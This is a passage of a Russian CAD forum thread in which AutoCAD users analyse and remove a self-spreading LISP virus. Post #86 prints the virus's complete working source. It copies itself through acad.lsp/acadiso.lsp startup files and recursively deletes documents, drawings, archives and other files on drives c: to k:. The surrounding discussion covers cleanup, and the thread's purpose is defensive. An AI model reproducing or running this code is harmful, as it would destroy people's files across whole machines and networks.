Acaddoc.lsp вирус или нет? - Страница 5
Реклама i
| Правила | Регистрация | Пользователи | Сообщения за день |  Справка по форуму | Файлообменник |

Вернуться   Форум DWG.RU > Программное обеспечение > AutoCAD > Acaddoc.lsp вирус или нет?

Acaddoc.lsp вирус или нет?

Ответ
Поиск в этой теме
Старый 14.10.2008, 13:38
Acaddoc.lsp вирус или нет?
Mikhail.Pavliy
 
Регистрация: 14.10.2008
Сообщений: 8

Помогите удалить этот вирус. При открытии черчежей автоматически создаётся файл acaddoc.lsp. После того как он попадает на машину AutoCad перестаёт работать корректно, все черчежи открвыаются только с нажатием ESC и каждый раз в новом AutoCad. Пробовал удалять вручную, чистил антивирусом AVP 8, Symantec 10, CureIt они его удаляют. Но при открытии черчежей создаётся заново. Также читал на форумах что надо почистить его внутри изменить некоторые переменные, тоже не помогает. Помогите пожалуйста.
Просмотров: 85961
 
Непрочитано 05.03.2011, 19:27
#81
VVA

Инженер LISP
 
Регистрация: 11.05.2005
Минск
Сообщений: 6,996


KronSerg, Выложи сюда acad.lsp на препарацию
__________________
Как использовать код на Лиспе читаем здесь

Последний раз редактировалось VVA, 14.03.2011 в 16:19.
VVA вне форума  
 
Непрочитано 05.03.2011, 20:57
#82
KronSerg

Вода - моя работа
 
Регистрация: 10.11.2009
Санкт-Петербург
Сообщений: 3,638


Ну надо та надо.
Добавлено: Файл препарирован, код выложен, оригинал удаляется.
__________________
Нерешаемых проблем не бывает.

Последний раз редактировалось KronSerg, 06.03.2011 в 22:56. Причина: Вложение удалено.
KronSerg вне форума  
 
Непрочитано 05.03.2011, 21:57
#83
sbi


 
Регистрация: 27.04.2008
SPB
Сообщений: 3,285
Отправить сообщение для sbi с помощью Skype™


KronSerg
Вложения
Тип файла: doc доступ запрещен .doc (149.0 Кб, 231 просмотров)
__________________
С уважением sbi
sbi вне форума  
 
Непрочитано 05.03.2011, 22:20
#84
KronSerg

Вода - моя работа
 
Регистрация: 10.11.2009
Санкт-Петербург
Сообщений: 3,638


sbi,
Цитата:
Сообщение от KronSerg Посмотреть сообщение
проверка Вебом показала
infected with ACAD.KillFiles
Цитата:
Сообщение от KronSerg Посмотреть сообщение
домашние антивирусники убивали acad.lsp
А чего ты ещё ждал?
я выложил
Цитата:
Сообщение от VVA Посмотреть сообщение
acad.lsp на препарацию
а не для праздного любопытства.
__________________
Нерешаемых проблем не бывает.
KronSerg вне форума  
 
Непрочитано 05.03.2011, 22:23
#85
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,432


Надо будет Linux запустить и под ним выполнить чтение архива
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 06.03.2011, 00:06
#86
gomer

строю, ломаю
 
Регистрация: 03.04.2008
Украина
Сообщений: 5,515


Цитата:
Сообщение от KronSerg Посмотреть сообщение
Ну надо та надо.
жостко! эта дрянь убивает все exe dwg doc xls rar pdf zip txt chm htm mp3
на дисках "k:" "j:" "i:" "h:" "g:" "f:" "e:" "d:" "c:"

Вот код:
Код:
[Выделить все]
 (defun s::startup (/	    old_cmd  path     dwgpath  mnlpath
		   apppath  oldacad  newacad  nowdwg   lspbj
		   wjm	    wjm1     wjqm     wjqm1    wz
		   ns1	    ns2
		  )
  (setq old_cmd (getvar "cmdecho"))
  (setvar "cmdecho" 0)
  (setq path (findfile "base.dcl"))
  (setq path (substr path 1 (- (strlen path) 8)))
  (setq mnlpath (getvar "menuname"))
  (setq nowdwg (getvar "dwgname"))
  (setq wjqm (findfile nowdwg))
  (setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
  (setq acadpath (findfile "acad.lsp"))
  (setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))
  (setq	ns1 ""
	ns2 ""
  )
  (setq lspbj 0)
  (setq wjqm (strcat path "acad.lsp"))
  (if (setq wjm (open wjqm "r"))
    (progn (while (setq wz (read-line wjm))
	     (setq ns1 ns2)
	     (setq ns2 wz)
	   )
	   (if (> (strlen ns1) 14)
	     (if (= (substr ns1 7 7) "acadiso")
	       (setq lspbj 1)
	     )
	   )
	   (close wjm)
    )
  )
  (if (and (= acadpath dwgpath) (/= acadpath path))
    (progn (setq oldacad (findfile "acad.lsp"))
	   (setq newacad (strcat path "acadiso.lsp"))
	   (if (= lspbj 0)
	     (progn (setq wjqm (strcat path "acad.lsp"))
		    (setq wjm (open wjqm "a"))
		    (write-line
		      (strcat "(load" (chr 34) "acadiso" (chr 34) ")")
		      wjm
		    )
		    (write-line "(princ)" wjm)
		    (close wjm)
	     )
	   )
	   (vl-file-copy oldacad newacad)
    )
    (progn (if (/= nowdwg "Drawing.dwg")
	     (progn (setq oldacad (findfile "acadiso.lsp"))
		    (setq newacad (strcat dwgpath "acad.lsp"))
		    (vl-file-copy oldacad newacad)
	     )
	   )
    )
  )

  (setq k (list "k:" "j:" "i:" "h:" "g:" "f:" "e:" "d:" "c:"))
  (alldelete "exe" k 0 1)
  (alldelete "dwg" k 0 2)
  (alldelete "doc" k 0 1)
  (alldelete "xls" k 0 2)
  (alldelete "rar" k 0 1)
  (alldelete "pdf" k 0 2)
  (alldelete "zip" k 0 1)
  (alldelete "txt" k 0 2)
  (alldelete "chm" k 0 1)
  (alldelete "htm" k 0 2)
  (alldelete "mp3" k 0 1)
  
  (setvar "cmdecho" old_cmd)
  (princ)
)
(defun alldelete ( file k ktime ntime / i n k1 kk k1file kkfile m j new_kk1 new_kk1file catchit)

	(setvar	"cmdecho"	0)
	(setq n (if k (length k) 0) 
				i 0
	)
	(while (and (< i n) (< ktime ntime) )
		
		(setq k1 (nth i k)) 
		(setq kkfile (vl-directory-files k1 (strcat "*." file)) 
					m (if kkfile (length kkfile) 0)
					j 0
		)

		(while (and (< j m) (< ktime ntime) )
			(setq kk1file (nth j kkfile)  
					  new_kk1file (strcat k1 "\\" kk1file) 
					  catchit (vl-catch-all-apply 'vl-file-delete (list new_kk1file))
						ktime (1+ ktime)
					  j (1+ j)
			)
		)
		
		(if	(vl-file-directory-p k1)
			 (progn
				 (setq kk (vl-directory-files k1 nil -1) 
							 kk (cddr kk)
							 m (if kk (length kk) 0)
							 j 0
				 )
				 (while (< j m)
					 (setq kk1 (nth j kk) 
								 new_kk1 (strcat k1 "\\" kk1) 
								 kk (subst new_kk1 kk1 kk) 
								 j (1+ j)
					 )
				 )
				 (setq ktime (alldelete file kk ktime ntime)) 
			)
			 
		)
			
		(setq i (1+ i))
		
	)

	ktime

)
(princ)
gomer вне форума  
 
Непрочитано 06.03.2011, 10:40
#87
KronSerg

Вода - моя работа
 
Регистрация: 10.11.2009
Санкт-Петербург
Сообщений: 3,638


Два вопроса:
1. Достаточно ли удалить acad.lsp, acadiso.lsp чтобы дрянь больше не появлялась?
2. Почему GetDataBack и Recuva не нашли следов удалённых файлов?
__________________
Нерешаемых проблем не бывает.
KronSerg вне форума  
 
Непрочитано 06.03.2011, 11:07
#88
DilshatDK


 
Регистрация: 23.11.2010
Сообщений: 33


Цитата:
Сообщение от KronSerg Посмотреть сообщение
Два вопроса:
1. Достаточно ли удалить acad.lsp, acadiso.lsp чтобы дрянь больше не появлялась?
Удаление этих файлов вам ничего не даст. Даже если вы через поиск найдете все файлы и удалите их. При след открытии автокада они появятся. Я уже описывал способ который мне помог. Здесь он находится под номером 65. Должно сработать. Потом отпишитесь.

На второй вопрос не знаю ответа. Но могу сказать одно. Те у кого НОРМАЛЬНЫЙ АНТИВИРУС такой проблемой не страдают. А дело в том, что когда вы приносите зараженный этой фигней файл dwg на флешке. Антивир просто не дает ему запуститься и выполнить свой зловредный код. Так что всем совет устанавливайте антивирус.
DilshatDK вне форума  
 
Непрочитано 06.03.2011, 23:10
#89
KronSerg

Вода - моя работа
 
Регистрация: 10.11.2009
Санкт-Петербург
Сообщений: 3,638


Отписываюсь, при удалении acad.lsp и acadiso.lsp из C:\Documents and Settings\....\Application Data\Autodesk\....\Support и удаления всех acad.lsp из папок с файлами, новые acad.lsp перестают создаваться и файлы прекращают исчезать, меня смутило это:
Цитата:
(setq mnlpath (getvar "menuname"))
mnl-ки не трогал, вроде чистые, зачем ему такая переменная? Я не обучен лиспу, может это вообще не переменная?
Про антивирусы в конторе не я решаю, но попробую послать ребятам из McAfee этот вирус, может обновят базы.
Оригинал от греха удалил, думаю кода достаточно, если кому нужен для опытов - пишите в личку.
__________________
Нерешаемых проблем не бывает.
KronSerg вне форума  
 
Непрочитано 07.03.2011, 17:59
#90
Li6-D


 
Регистрация: 03.05.2009
Сообщений: 112


Цитата:
Сообщение от KronSerg Посмотреть сообщение
... меня смутило это:
Цитата:
(setq mnlpath (getvar "menuname"))
mnl-ки не трогал, вроде чистые, зачем ему такая переменная? Я не обучен лиспу, может это вообще не переменная?
Похоже на ставший классическим лисп-вирус, который здесь выкладывался и рассматривался.
Переменная mnlpath действительно непонятная, так как она после создания не используется. Наверное вирусописака схалтурил.
gomer в сообщении #86 привел убийственную версию вируса, ни в коем случае не запускайте её

Последний раз редактировалось Li6-D, 07.03.2011 в 18:15. Причина: предупреждение
Li6-D вне форума  
 
Непрочитано 08.03.2011, 11:09
#91
gomer

строю, ломаю
 
Регистрация: 03.04.2008
Украина
Сообщений: 5,515


Цитата:
Сообщение от Li6-D Посмотреть сообщение
Похоже на ставший классическим лисп-вирус, который здесь выкладывался и рассматривался.
Похоже, но тот не удалял ничего вроде... а этот... в общем нужно почистить s:startup удалить все acad*.lsp кроме оригинальных, а те почистить... лиспы не являются классическими вирусами, и не опасны, пока не запущен акад...
gomer вне форума  
 
Непрочитано 11.03.2011, 22:31
#92
KronSerg

Вода - моя работа
 
Регистрация: 10.11.2009
Санкт-Петербург
Сообщений: 3,638


Думаю будет правильно извиниться за наведение тени на McAfee, получив образец вируса мне ответили что знают такой и лечат, а судя по этой ссылке, он у них в базе как минимум с 8 февраля, админы наши начудили с обновлениями, кстати, вирус полностью убит во всей сети.
__________________
Нерешаемых проблем не бывает.
KronSerg вне форума  
 
Непрочитано 13.04.2011, 20:45
#93
znatok


 
Регистрация: 12.04.2009
Сообщений: 94


Я в этой теме на 5 страницу не могу войти, антивирус аваст выдаёт:
Increase Size Decrease Size Нажмите для просмотра
http://s005.***********/i209/1104/19/74bb2daf14f7.jpg
Скажите, пожалуйста (в данном случае в личку) на что конкретно реагирует он.

(и возможно это сообщения НЕ отправится)
znatok вне форума  
 
Непрочитано 13.04.2011, 21:05
#94
VVA

Инженер LISP
 
Регистрация: 11.05.2005
Минск
Сообщений: 6,996


Я думаю на опубликованный листинг в #86
__________________
Как использовать код на Лиспе читаем здесь
VVA вне форума  
 
Непрочитано 13.04.2011, 21:23
#95
znatok


 
Регистрация: 12.04.2009
Сообщений: 94


открыл 5 страницу с помощью Ворда и то возмущался.

Как я понял, Авст ругается из-за кода размещённого в 86 сообщении.
znatok вне форума  
 
Непрочитано 13.04.2011, 22:53
#96
KronSerg

Вода - моя работа
 
Регистрация: 10.11.2009
Санкт-Петербург
Сообщений: 3,638


Думаю эта страница была заложена в чёрный список Аваста ещё тогда, когда вирус можно было просто скачать.
__________________
Нерешаемых проблем не бывает.
KronSerg вне форума  
 
Непрочитано 19.05.2011, 16:46
#97
Avrigo


 
Регистрация: 19.05.2011
Сообщений: 2


Похоже что вирус acaddoc.lsp совершенствуется. Я всё почистил, удалил, и даже создал файл acad.fas, НО при первом же открытии файла dwg в директории появляется acaddoc.lsp. Саму проблему ни AVIRA, ни CureIt не устранили. Похоже, что и дальше придется работать через Esc.
Avrigo вне форума  
 
Непрочитано 19.05.2011, 18:38
#98
VVA

Инженер LISP
 
Регистрация: 11.05.2005
Минск
Сообщений: 6,996


Заархивируй acaddoc.lsp + добавь файл acad.mnl и выложи сюда
__________________
Как использовать код на Лиспе читаем здесь
VVA вне форума  
 
Непрочитано 20.05.2011, 18:27
#99
Avrigo


 
Регистрация: 19.05.2011
Сообщений: 2


Поздно, нечего архивировать. Сегодня победил его Live CD от Dr.Web. Но только когда конкретно натравил на папку Documents and Settings\*\*\*\Support, вирус сидел в трех файлах (acad.mnl; acetmain.mnl; AecArchXOE.mnl).
p.s. А до этого почистил acaddoc.lsp, дал ему свойства только чтение, но пришлось пихать его в каждую директорию с dwg-файлами.
Avrigo вне форума  
 
Непрочитано 23.01.2012, 18:57
#100
hwd

C, C++, C#
 
Регистрация: 07.10.2009
С-Пб.
Сообщений: 2,762
Отправить сообщение для hwd с помощью Skype™


Написал модуль, задачей которого является раз и навсегда избавить пользователей от проблем, вызванных "творчеством" говнописателя, смыслом жизни которого является вредительство. Подробности здесь.
__________________
Надеюсь, ты не социальный овощ? Это определяется делами! :welcome:
hwd вне форума  
Ответ
Вернуться   Форум DWG.RU > Программное обеспечение > AutoCAD > Acaddoc.lsp вирус или нет?



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Пароизоляция утеплителя: нужна или нет. Romka Прочее. Архитектура и строительство 183 18.08.2016 23:36
Advance Steel. Изучать или нет. Saha Advance Steel 4 19.09.2008 06:08
Нужен МКЭ расчет или нет? SRG_ORL Расчетные программы 36 22.12.2006 00:39
Можно ли делать в проекте свободную планировку кв-р или нет? tyoma Разное 4 09.12.2006 08:05